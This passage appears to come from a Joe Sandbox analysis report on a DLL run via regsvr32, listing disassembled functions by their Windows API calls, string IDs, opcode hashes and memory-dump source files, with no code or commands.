                                                                                                                                                                                    • Opcode ID: 7f9bfa7f6b3b9fdd36b8e81f9ee80aab1db3c1f38b0960ba002171062fd1780c
                                                                                                                                                                                    • Instruction ID: f0232f039d8bce094d8b32849d96be76d1f87cc1526168bd6dc77fb22e7aae15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f9bfa7f6b3b9fdd36b8e81f9ee80aab1db3c1f38b0960ba002171062fd1780c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F31BF3260075C4AE3939F65A8817ED7751A7C97E0F65C616BA2507BC3CFB8CA09C714
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStartupInfoA.KERNEL32 ref: 0000000180024DBD
                                                                                                                                                                                      • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    • GetFileType.KERNEL32 ref: 0000000180024F3A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 1527402494-2766056989
                                                                                                                                                                                    • Opcode ID: 4115f97c95f48f42d5fb0d7c09de9e27c90b4dcbb02c20c61c57aa5a611d3b54
                                                                                                                                                                                    • Instruction ID: 787ffa1011b319094256726134ae780eee21af125c7e7e84dcace78b9ee0a316
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4115f97c95f48f42d5fb0d7c09de9e27c90b4dcbb02c20c61c57aa5a611d3b54
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B91D232200A8885E7938B24D8887D83799F3497F4F66C725E6794B3D0DF38CA4AC351
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                                                                    • String ID: $System
                                                                                                                                                                                    • API String ID: 1529587224-3632600494
                                                                                                                                                                                    • Opcode ID: d2703cc869ed1a886df224d2db9d943919ea9925d38045901a0c3b8a65b2d957
                                                                                                                                                                                    • Instruction ID: 2ec2ac6396577c323e07ed7633a118e9507b8bfdffa3f7a026bb8033331b454e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2703cc869ed1a886df224d2db9d943919ea9925d38045901a0c3b8a65b2d957
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251E435200A4C47FBAADB65A4853EA3360F74C7D4F14C622FA6A836D5DF38D65C8701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$AtomDeleteGlobal
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 622211665-0
                                                                                                                                                                                    • Opcode ID: 21cadab93b084a3aca9f40b95dda2b5d4659b4390553c7fa0275e1dcf1520850
                                                                                                                                                                                    • Instruction ID: 256857c22df60e5953c5d778c392966909792f1112518ace18b13e53ff84b243
                                                                                                                                                                                    • Opcode Fuzzy Hash: 21cadab93b084a3aca9f40b95dda2b5d4659b4390553c7fa0275e1dcf1520850
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41ED32205E8881EB92DB61D5903ED7365FB8CFC4F558221EA5E477A6CF75CA89C310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _errno
• String ID:
• API String ID: 2918714741-0
• Opcode ID: 1812c0f08b3c91dba4667278a0a23935b929cddd7c86df6e234f18bbf35c51e8
• Instruction ID: b8cb160ec996a59629ed9919aa9213f644f9b8d2e066b9a818b4595355941c27
• Instruction Fuzzy Hash: B4310631A1064C4AF7D36F7494453EE6711A78D7E0F55C229FA25076D3CFBC8A498714
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _cwprintf_s_l
• String ID: %s (%s:%d)$%s (%s:%d)%s$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
• API String ID: 2941638530-1547102704
• Opcode ID: a1729cb3b559574853afee8893454c7f5dd18c679475ff671ed86927da65b811
• Instruction ID: 069268042e3cb74b8a3afc57b8637407fc1a9215e2d175f679b7f0bd571a46fb
• Instruction Fuzzy Hash: DC216B36200A48D6EB96DF25E8807ED6361F788BC8F958412FA0E43765DF38CA8DC340
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Heap_errno$AllocDecodeErrorInformationLastPointerQuerySize
• String ID:
• API String ID: 3929725371-0
• Opcode ID: 12c4976b141d612dcd5d330fd3ec714f76899af343f045324a6be9cfcfc1dd57
• Instruction ID: 062cf6bf7f7628caa203472146d01a39a91c2f33369974265bdc5446454d3509
• Instruction Fuzzy Hash: 1C218231600B4C8AFBA3AB61B4043DA63A1B79DBD5F54C625BE5D47BD5DF38C6488700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _cwprintf_s_l
• String ID: %s (%s:%d)$%s (%s:%d)%s$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
• API String ID: 2941638530-49975270
• Opcode ID: c724c86bb45442d739b1fba9f3ec93512766b425ee96f71a149b15e3be575dfd
• Instruction ID: 4f32fa752ccb912587874914e0efdef237d754c3ea33ebf9ac449787003c76f0
• Instruction Fuzzy Hash: 20214A76201E49D6EB96DF65E8907E92360F789BD8F848026BA0E47765DF38C68DC340
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _cwprintf_s_l
• String ID: %s (%s:%d)$%s (%s:%d)%s$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
• API String ID: 2941638530-3838821042
• Opcode ID: 0a135b7371076fea88fa5a50cbab8ea7c558774cfa4fc1f5e82a052c743733c8
• Instruction ID: 2fa1177910dd0dcacec49574704993d9df7ec86c5064cafcb5f9df024e6f0ea7
• Instruction Fuzzy Hash: 04218C72200E49DAEB96DF24D8407E92361F788BD8F858122FA0E47765DF38C68CC300
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _getptd$ExceptionRaise
• String ID: csm
• API String ID: 2255768072-1018135373
• Opcode ID: ea574b5edaaeab3ca260add0885928c84f8804db7bdd6b1f2d047af1ca93cd8b
• Instruction ID: b9e2784e194229325601cefd8c9894d73a91a3f0af42d97bb3ad41b1dd7c7a26
• Instruction Fuzzy Hash: 89314D3620068886D6A3DF11E04DBAE7764F39CBE1F528126EE5917791CF35D689CB00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: MessageSend$Parent$ActiveCaptureFocusLastLongPopupWindow
• String ID:
• API String ID: 3194460488-0
• Opcode ID: cc96ef4c442f95d66963967e32dfbcd3254cab8da31def956c74eb2c6720cbc7
• Instruction ID: 07c438c58fd00e46daf1bbc851bc390cf407a58e354d1e5a6537ddeb8b99ea43
• Instruction Fuzzy Hash: 01215730315E4D42FFE75B51A555FEA17A0AB8CBC5F18E435BD0A0BB91EE39C64A4700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _FF_MSGBANNER.LIBCMT ref: 0000000180026EBB
                                                                                                                                                                                      • Part of subcall function 0000000180025A20: GetModuleFileNameA.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025AE3
                                                                                                                                                                                      • Part of subcall function 0000000180020F28: ExitProcess.KERNEL32 ref: 0000000180020F37
                                                                                                                                                                                      • Part of subcall function 0000000180024C20: malloc.LIBCMT ref: 0000000180024C3F
                                                                                                                                                                                      • Part of subcall function 0000000180024C20: Sleep.KERNEL32(?,?,00000000,0000000180026EF5,?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0), ref: 0000000180024C56
                                                                                                                                                                                    • _errno.LIBCMT ref: 0000000180026EFD
                                                                                                                                                                                    • _lock.LIBCMT ref: 0000000180026F11
                                                                                                                                                                                    • free.LIBCMT ref: 0000000180026F33
                                                                                                                                                                                    • _errno.LIBCMT ref: 0000000180026F38
                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0,?,?,00000018,0000000180020621), ref: 0000000180026F5E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1024173049-0
                                                                                                                                                                                    • Opcode ID: d1c18c0459d98f96b4427944a3fbbb8438d4153634f096a9af820caac949fb41
                                                                                                                                                                                    • Instruction ID: eb38f224bc67bb9a445eac6bcc21c339ea187fc349147bf310b7517d9eab2bff
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c18c0459d98f96b4427944a3fbbb8438d4153634f096a9af820caac949fb41
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD21AC31A1174C86FAE3AB10F6453EA6394E78C7C5F54C434BA4A87AE6CF38CA488340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreePrinter.Unlocklstrcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 992435789-0
                                                                                                                                                                                    • Opcode ID: e404d6227590b9a59288eec4fe9c0a3830750e9ec27887a395cfdb28078c9a7f
                                                                                                                                                                                    • Instruction ID: 52eb7aaa83a20578586af01048df22031be017a7ba6e2f9e2f91c51488b2ccc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: e404d6227590b9a59288eec4fe9c0a3830750e9ec27887a395cfdb28078c9a7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8721A171200E8846EB96DB65E5153EE6360FB8CBC9F04C525FF4E4B69ACF6CC6488700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                                                                                    • String ID: software
                                                                                                                                                                                    • API String ID: 1740278721-2010147023
                                                                                                                                                                                    • Opcode ID: 026de6d3dabde66a7284c77aefd9f3685b75e7f7ab408ad583b1c2c2cf688818
                                                                                                                                                                                    • Instruction ID: 444d633d9187978a12a0fa75b982214a58ef8caa87376705657d4a0c6fc2483b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 026de6d3dabde66a7284c77aefd9f3685b75e7f7ab408ad583b1c2c2cf688818
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A217F76215B8486EBA18B50E084B9A73A4F79C7D9F509215EA8D07B58DF7CC28CCB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsSystem$CapsDevice
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4163108049-0
                                                                                                                                                                                    • Opcode ID: d752bd71947f282ea93a2ee621bf6cf5e84ce030729ab8c7d58ed3bf0a16cd52
                                                                                                                                                                                    • Instruction ID: 8fd946fc15118f12ad27ed37d6484ced67352ca24f295e30966117a639810bd0
                                                                                                                                                                                    • Opcode Fuzzy Hash: d752bd71947f282ea93a2ee621bf6cf5e84ce030729ab8c7d58ed3bf0a16cd52
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DA71A00A488BE7869F62E95839A73A1F74C7D2F11C439EB5A87750DF3C85598B04
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$Brush
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2798902688-0
                                                                                                                                                                                    • Opcode ID: 18eeb132bac237a1294618d5aa15b2339296e4a329d5ccadde4d3f6957de983e
                                                                                                                                                                                    • Instruction ID: b999b25cf13381f3060bd8ace5867cc69c76ca22164369b16d0babe83c9499b0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18eeb132bac237a1294618d5aa15b2339296e4a329d5ccadde4d3f6957de983e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F03A75900B0ACBE79A5FB0E4583EA3776F74CB86F055028DA0607394EF3D8599C780
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Enable$ParentProcess$ActiveCurrentEnabledFileLastLongMessageModuleNamePopupSendThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1819874647-0
                                                                                                                                                                                    • Opcode ID: dd76a1e0fe300af98cd5c98082d7fd3ae09e6031c961fd41811a08b5e2ee2536
                                                                                                                                                                                    • Instruction ID: fec9ee7dc3b768c015497362c1b1f96467f6d852583e54493d31c8a435687f38
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd76a1e0fe300af98cd5c98082d7fd3ae09e6031c961fd41811a08b5e2ee2536
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1941E43620498887E7F25B25E4117DB6790F78C7DFF488111BA8A4BB85DF7CC6888700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 670545878-0
                                                                                                                                                                                    • Opcode ID: bfe6091dfb9970da829bf1f5eb4104c1db9e7eb8b03aa8dbcf1ee566a42d294b
                                                                                                                                                                                    • Instruction ID: b2ee5342cce6e9884ecb1e69a68a3423dcca351c17ab9e8f1c4f652b6b4c67b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bfe6091dfb9970da829bf1f5eb4104c1db9e7eb8b03aa8dbcf1ee566a42d294b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F312B31205E49C2EFDB9B56A5503E962A0AB5DBC2F1CC534FE9A0B785EF78C6088300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2210154019-0
                                                                                                                                                                                    • Opcode ID: b34d10246a834ae36c9699356d58b6084fdef1ec799a6c442e7d379ee08ec199
                                                                                                                                                                                    • Instruction ID: 5a68c21d2beea6716c550d6677df53c04d32664e6f0fec96d344ba95286d9390
                                                                                                                                                                                    • Opcode Fuzzy Hash: b34d10246a834ae36c9699356d58b6084fdef1ec799a6c442e7d379ee08ec199
                                                                                                                                                                                    • Instruction Fuzzy Hash: A1315C71214A4982EBA38B10E4853D663A0F78D7B9F509305F679879E4DF7DC68CCB40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 0000000180023382
                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 0000000180023390
                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 00000001800233E8
                                                                                                                                                                                      • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 00000001800233BC
                                                                                                                                                                                    • free.LIBCMT ref: 00000001800233DF
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00000001800233D0
                                                                                                                                                                                    Memory Dump Source
